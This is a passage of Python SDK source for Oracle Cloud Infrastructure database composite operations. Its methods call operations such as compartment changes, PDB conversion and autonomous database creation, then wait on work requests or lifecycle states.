try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def change_database_software_image_compartment_and_wait_for_work_request(self, change_compartment_details, database_software_image_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.change_database_software_image_compartment` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.ChangeCompartmentDetails change_compartment_details: (required)
Request to move Database Software Image to a different compartment
:param str database_software_image_id: (required)
The DB system `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.change_database_software_image_compartment`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.change_database_software_image_compartment(change_compartment_details, database_software_image_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def change_db_system_compartment_and_wait_for_work_request(self, change_compartment_details, db_system_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.change_db_system_compartment` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.ChangeCompartmentDetails change_compartment_details: (required)
Request to move the DB system to a different compartment.
**Note:** Deprecated for Exadata Cloud Service systems. Use the `new resource model APIs`__ instead.
For Exadata Cloud Service instances, support for this API will end on May 15th, 2021. See `Switching an Exadata DB System to the New Resource Model and APIs`__ for details on converting existing Exadata DB systems to the new resource model.
__ https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/exaflexsystem.htm#exaflexsystem_topic-resource_model
__ https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/exaflexsystem_topic-resource_model_conversion.htm
:param str db_system_id: (required)
The DB system `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.change_db_system_compartment`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.change_db_system_compartment(change_compartment_details, db_system_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def change_exadata_infrastructure_compartment_and_wait_for_work_request(self, change_exadata_infrastructure_compartment_details, exadata_infrastructure_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.change_exadata_infrastructure_compartment` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.ChangeExadataInfrastructureCompartmentDetails change_exadata_infrastructure_compartment_details: (required)
Request to move Exadata infrastructure to a different compartment
:param str exadata_infrastructure_id: (required)
The Exadata infrastructure `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.change_exadata_infrastructure_compartment`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.change_exadata_infrastructure_compartment(change_exadata_infrastructure_compartment_details, exadata_infrastructure_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def change_external_container_database_compartment_and_wait_for_work_request(self, change_compartment_details, external_container_database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.change_external_container_database_compartment` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.ChangeCompartmentDetails change_compartment_details: (required)
Request to move the external container database to a different compartment.
:param str external_container_database_id: (required)
The ExternalContainerDatabase `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.change_external_container_database_compartment`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.change_external_container_database_compartment(change_compartment_details, external_container_database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def change_external_non_container_database_compartment_and_wait_for_work_request(self, change_compartment_details, external_non_container_database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.change_external_non_container_database_compartment` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.ChangeCompartmentDetails change_compartment_details: (required)
Request to move the external non-container database to a different compartment.
:param str external_non_container_database_id: (required)
The external non-container database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.change_external_non_container_database_compartment`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.change_external_non_container_database_compartment(change_compartment_details, external_non_container_database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def change_external_pluggable_database_compartment_and_wait_for_work_request(self, change_compartment_details, external_pluggable_database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.change_external_pluggable_database_compartment` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.ChangeCompartmentDetails change_compartment_details: (required)
Request to move the
:func:`create_external_pluggable_database_details` resource
to a different compartment.
:param str external_pluggable_database_id: (required)
The ExternalPluggableDatabaseId `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.change_external_pluggable_database_compartment`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.change_external_pluggable_database_compartment(change_compartment_details, external_pluggable_database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def change_key_store_compartment_and_wait_for_work_request(self, change_key_store_compartment_details, key_store_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.change_key_store_compartment` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.ChangeKeyStoreCompartmentDetails change_key_store_compartment_details: (required)
Request to move key store to a different compartment
:param str key_store_id: (required)
The `OCID`__ of the key store.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.change_key_store_compartment`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.change_key_store_compartment(change_key_store_compartment_details, key_store_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def change_vm_cluster_compartment_and_wait_for_work_request(self, change_vm_cluster_compartment_details, vm_cluster_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.change_vm_cluster_compartment` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.ChangeVmClusterCompartmentDetails change_vm_cluster_compartment_details: (required)
Request to move the Exadata Cloud@Customer VM cluster to a different compartment.
:param str vm_cluster_id: (required)
The VM cluster `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.change_vm_cluster_compartment`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.change_vm_cluster_compartment(change_vm_cluster_compartment_details, vm_cluster_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def check_external_database_connector_connection_status_and_wait_for_work_request(self, external_database_connector_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.check_external_database_connector_connection_status` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str external_database_connector_id: (required)
The `OCID`__ of the
external database connector resource (`ExternalDatabaseConnectorId`).
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.check_external_database_connector_connection_status`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.check_external_database_connector_connection_status(external_database_connector_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def complete_external_backup_job_and_wait_for_work_request(self, backup_id, complete_external_backup_job_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.complete_external_backup_job` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str backup_id: (required)
The backup `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.CompleteExternalBackupJobDetails complete_external_backup_job_details: (required)
Updates the status of the backup resource.
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.complete_external_backup_job`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.complete_external_backup_job(backup_id, complete_external_backup_job_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def configure_autonomous_database_vault_key_and_wait_for_work_request(self, autonomous_database_id, configure_autonomous_database_vault_key_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.configure_autonomous_database_vault_key` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str autonomous_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.ConfigureAutonomousDatabaseVaultKeyDetails configure_autonomous_database_vault_key_details: (required)
Configuration details for the Autonomous Database Vault service `key`__.
__ https://docs.cloud.oracle.com/Content/KeyManagement/Concepts/keyoverview.htm#concepts
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.configure_autonomous_database_vault_key`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.configure_autonomous_database_vault_key(autonomous_database_id, configure_autonomous_database_vault_key_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def convert_to_pdb_and_wait_for_work_request(self, database_id, convert_to_pdb_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.convert_to_pdb` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.ConvertToPdbDetails convert_to_pdb_details: (required)
Request to convert a non-container database to a pluggable database.
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.convert_to_pdb`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.convert_to_pdb(database_id, convert_to_pdb_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def convert_to_pdb_and_wait_for_state(self, database_id, convert_to_pdb_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.convert_to_pdb` and waits for the :py:class:`~oci.database.models.Database` acted upon
to enter the given state(s).
:param str database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.ConvertToPdbDetails convert_to_pdb_details: (required)
Request to convert a non-container database to a pluggable database.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.Database.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.convert_to_pdb`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.convert_to_pdb(database_id, convert_to_pdb_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_autonomous_container_database_and_wait_for_work_request(self, create_autonomous_container_database_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.create_autonomous_container_database` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.CreateAutonomousContainerDatabaseDetails create_autonomous_container_database_details: (required)
Request to create an Autonomous Container Database in a specified Autonomous Exadata Infrastructure or in Autonomous VM Cluster.
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_autonomous_container_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_autonomous_container_database(create_autonomous_container_database_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_autonomous_container_database_and_wait_for_state(self, create_autonomous_container_database_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.create_autonomous_container_database` and waits for the :py:class:`~oci.database.models.AutonomousContainerDatabase` acted upon
to enter the given state(s).
:param oci.database.models.CreateAutonomousContainerDatabaseDetails create_autonomous_container_database_details: (required)
Request to create an Autonomous Container Database in a specified Autonomous Exadata Infrastructure or in Autonomous VM Cluster.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.AutonomousContainerDatabase.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_autonomous_container_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_autonomous_container_database(create_autonomous_container_database_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_autonomous_container_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_autonomous_database_and_wait_for_work_request(self, create_autonomous_database_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.create_autonomous_database` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.CreateAutonomousDatabaseBase create_autonomous_database_details: (required)
Request to create a new Autonomous Database.
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_autonomous_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_autonomous_database(create_autonomous_database_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_autonomous_database_and_wait_for_state(self, create_autonomous_database_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.create_autonomous_database` and waits for the :py:class:`~oci.database.models.AutonomousDatabase` acted upon
to enter the given state(s).
:param oci.database.models.CreateAutonomousDatabaseBase create_autonomous_database_details: (required)
Request to create a new Autonomous Database.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.AutonomousDatabase.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_autonomous_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_autonomous_database(create_autonomous_database_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_autonomous_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_autonomous_database_backup_and_wait_for_work_request(self, create_autonomous_database_backup_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.create_autonomous_database_backup` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.CreateAutonomousDatabaseBackupDetails create_autonomous_database_backup_details: (required)
Request to create a new Autonomous Database backup.
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
